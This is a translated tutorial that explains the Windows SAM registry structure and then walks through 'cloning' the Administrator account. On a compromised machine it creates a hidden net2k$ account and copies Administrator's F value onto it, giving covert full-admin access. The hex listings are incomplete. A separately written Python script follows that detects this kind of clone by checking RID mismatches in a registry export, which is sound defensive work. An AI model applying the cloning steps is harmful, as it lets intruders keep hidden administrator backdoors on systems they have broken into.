Windows 2000 ships two registry editors, regedit.exe and regedt32.exe; in XP and Windows Server 2003 the two are merged, and running regedt32.exe simply launches regedit.exe. Everyone should be very familiar with regedit.exe, but it cannot set permissions on registry keys, and the big advantage of regedt32.exe is precisely that it can. NT/2000/XP/2003 all keep their account information under the registry key HKEY_LOCAL_MACHINE\SAM\SAM, and apart from the SYSTEM account no user has the right to view it. A few words about the SAM: the SAM (Security Account Manager) is responsible for controlling and maintaining the SAM database. The SAM database lives under the registry key HKLM\SAM\SAM and is protected by an ACL; you can open the Registry Editor with regedt32.exe and grant yourself the appropriate permissions to view the contents of the SAM. On disk the SAM database is stored as a file in the %systemroot%\system32\config\ directory, alongside a file named SECURITY, which holds the security database and is closely related to it (I do not know much about that part). The SAM database holds information on all groups and accounts, including password hashes, SIDs and so on. The system I analysed here is a Chinese Windows 2003 Server (sorry, I did not have Windows 2000 installed :( ). First use regedt32.exe (on 2003, regedit) to grant yourself "Full Control" on the SAM key; after that the information under the SAM key can be read and written.
Expand the registry key HKEY_LOCAL_MACHINE\SAM:

HKEY_LOCAL_MACHINE\SAM
  SAM
    Domains
      Account
        Aliases
          000003E8
          000003EA
          Members
            S-1-5-21-317928648-61192537-2235348617
              000003ED
          Names
            HelpServicesGroup
            TelnetClients
        Groups
          00000201
          Names
        Users
          000001F4
          000001F5
          000003E9
          000003ED
          Names
            Net2k$
            Guest
            IUSR_NET2K-KAXXY6SZ3
            IWAM_NET2K-KAXXY6SZ3
            SUPPORT_388945a0
      Builtin
        Aliases
          00000220
          00000222
          00000226
          00000227
          0000022B
          0000022E
          0000022F
          Members
            S-1-5
              00000004
              0000000B
              00000014
            S-1-5-21-3179286488-61192537-2235348617
              000001F4
              000003EC
          Names
            Administrators
            Guests
            Network Configuration Operators
            Performance Monitor Users
            Power Users
            Print Operators
            Remote Desktop Users
            Replicator
            Users
        Groups
          Names
        Users
          Names
    RXACT

This is the structure of the SAM database in the registry on my machine, the SAM tree. Within the whole database, the main account content sits below \Domains\, which holds the SAM content of the domain (or of the standalone machine) and has two branches, Account and Builtin. \Domains\Account holds the user accounts, and \Domains\Account\Users holds the information on each individual account; its subkeys are named after the relative identifier (RID) of each account.
Take 000001F4 as an example: under each account key there are two values, F and V. \Domains\Account\Users\Names holds the user account names. Each account name has only a single default value, whose type is not an ordinary registry data type but the last component of the account's SID, the relative identifier. Under Administrator, for instance, the type is 0x1f4, which corresponds to the 000001F4 key seen earlier, i.e. the content of the account Administrator. If we change the type of some other account's Names entry to 0x1f4, that account is directed to the 000001F4 account, and 000001F4 is the Administrator account, so during logon the system treats it entirely as Administrator: the modified account uses Administrator's information, including password, permissions, desktop, records, access times and so on. This is what the so-called cloning of a super-administrator account means. Owing to the limits of my own knowledge I will not introduce the SAM database any further; if you want to know more, look up the material yourself. What follows mainly describes how to carry out this clone and hide the account. With the above understood, the next job is easier to do. The specific steps are as follows:

1. Suppose we have a terminal session on a compromised machine (a "broiler") with super-user (administrator) rights. First create an account at the command line or in the account manager: net2k$. Here I created it at the command line:

   net user net2k$ 123456 /add

2. Click "Start" → "Run", type regedit.exe and press Enter to start the Registry Editor.

3. Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\net2k$. Export the items net2k$, 000003F2 and 000001F4 as kelong.reg, 3f2.reg and admin.reg, then edit the exported files separately in Notepad: copy the value of the "F" key under 000001F4 and overwrite the "F" value under 000003F2 (the net2k$ key) with it. In detail, the contents are as follows.

   Value "F" under 000001F4:

   "F"=hex:02,00,01,00,00,00,00,58,35,E6,BA,B7,85,C4,01,00,00,00,00,00,00,00,00,\
     6A,09,B0,B2,6F,71,C4,01,00,00,00,00,00,00,32,47,EC,F7,5C,84,C4,01,\
     F4,01,00,01,02,00,00,10,00,00,00,00,00,00,86 (the rest of the listing is not preserved)

   Value "F" under the SID item 000003F2 (account net2k$):

   "F"=hex:02,00,00,00,00,00,00,00,00,00,00,00,00,00,CE,21,90,CA,EB,85,C4,01,\
     00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
     F2,03,00,01,02,00,10,00,00,00,00,00,00,00,00,01,00,00,00,00,00,\
     00,00,00,00,00,00,00,5F,00 (the rest of the listing is not preserved)

   Then append 3f2.reg to kelong.reg.
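As a defender's counterpart to the procedure above, here is an added example, written for this edit and not taken from the article, that audits a regedit export of the \Domains\Account\Users subtree for the two indicators the article's own description implies: an F value whose embedded RID differs from the RID in its key name, and two Names entries whose default-value type points at the same RID. The F layout it reads (a 32-bit little-endian RID at offset 0x30 and 16-bit account-control bits at 0x38) is an assumption matched against the byte positions in the dumps above, the export text it parses is constructed, and the `@=hex(1f4):` form is the notation regedit uses when exporting a value of a non-standard type.

```python
"""Audit a regedit export of HKLM\\SAM\\SAM\\Domains\\Account\\Users for cloned-account
indicators. Constructed example: the sample export is not the article's data, and the
F layout (RID at 0x30, account-control bits at 0x38) is an assumption matched against
the article's dumps."""
import re

RID_OFFSET = 0x30   # 32-bit little-endian relative identifier inside "F" (assumed)
ACB_OFFSET = 0x38   # 16-bit little-endian account-control bits inside "F" (assumed)
ACB_NORMAL = 0x0010
F_SIZE = 0x50       # size of the constructed F blobs

USERS_PREFIX = r"HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\"
KEY_RE = re.compile(r"^\[" + USERS_PREFIX + r"(Names\\)?([^\]]+)\]$", re.I)
F_RE = re.compile(r'^"F"=hex:(.*)$', re.I)
NAME_RE = re.compile(r"^@=hex\(([0-9a-f]+)\):", re.I)


def make_f(rid, acb=ACB_NORMAL):
    """Build a constructed F blob with only the fields this audit inspects filled in."""
    buf = bytearray(F_SIZE)
    buf[0:2] = b"\x02\x00"  # revision field, as at the start of the article's dumps
    buf[RID_OFFSET:RID_OFFSET + 4] = rid.to_bytes(4, "little")
    buf[ACB_OFFSET:ACB_OFFSET + 2] = acb.to_bytes(2, "little")
    return bytes(buf)


def hex_to_bytes(payload):
    """Decode the comma-separated byte list of a .reg hex value (continuations joined)."""
    return bytes(int(p, 16) for p in payload.replace("\\", "").split(",") if p.strip())


def rid_from_f(f):
    return int.from_bytes(f[RID_OFFSET:RID_OFFSET + 4], "little")


def acb_from_f(f):
    return int.from_bytes(f[ACB_OFFSET:ACB_OFFSET + 2], "little")


def parse_users_export(reg_text):
    """Return ({key RID: F bytes}, {account name: RID taken from the Names value type})."""
    users, names, current = {}, {}, None
    lines = reg_text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        key = KEY_RE.match(line)
        if key:
            current = ("name", key.group(2)) if key.group(1) else ("rid", int(key.group(2), 16))
        elif current and current[0] == "rid" and F_RE.match(line):
            payload = F_RE.match(line).group(1)
            while payload.endswith("\\") and i + 1 < len(lines):  # .reg wraps long values
                i += 1
                payload += lines[i].strip()
            users[current[1]] = hex_to_bytes(payload)
        elif current and current[0] == "name" and NAME_RE.match(line):
            names[current[1]] = int(NAME_RE.match(line).group(1), 16)
        i += 1
    return users, names


def audit(reg_text):
    """List cloned-account indicators: F/RID mismatch, and two names sharing one RID."""
    users, names = parse_users_export(reg_text)
    findings = []
    for key_rid, f in sorted(users.items()):
        if rid_from_f(f) != key_rid:
            findings.append("Users\\%08X: F carries RID 0x%X but the key is 0x%X"
                            % (key_rid, rid_from_f(f), key_rid))
    claims = {}
    for name, rid in names.items():
        claims.setdefault(rid, []).append(name)
    for rid, owners in sorted(claims.items()):
        if len(owners) > 1:
            findings.append("RID 0x%X is claimed by %s" % (rid, ", ".join(sorted(owners))))
    return findings


def sample_export():
    """Constructed export: Administrator (0x1F4) is clean; net2k$ (0x3F2) has had its F
    value replaced by Administrator's and its Names entry re-pointed to 0x1F4."""
    def key(path, value):
        return "[%s]\n%s\n" % (path, value)
    users = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
    f_admin = ",".join("%02x" % b for b in make_f(0x1F4))
    return "Windows Registry Editor Version 5.00\n\n" + \
        key(users + r"\000001F4", '"F"=hex:' + f_admin) + \
        key(users + r"\000003F2", '"F"=hex:' + f_admin[:60] + "\\\n  " + f_admin[60:]) + \
        key(users + r"\Names\Administrator", "@=hex(1f4):") + \
        key(users + r"\Names\net2k$", "@=hex(1f4):")


if __name__ == "__main__":
    for finding in audit(sample_export()):
        print(finding)
```

Run against a real export (`regedit /e users.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"` from a SYSTEM-level shell, or an offline hive converted the same way), the two checks catch exactly the edit the article describes: the F copied from 000001F4 still carries RID 0x1F4 under the 000003F2 key, and the re-typed Names entry makes two names resolve to the same RID. A clean export produces an empty list.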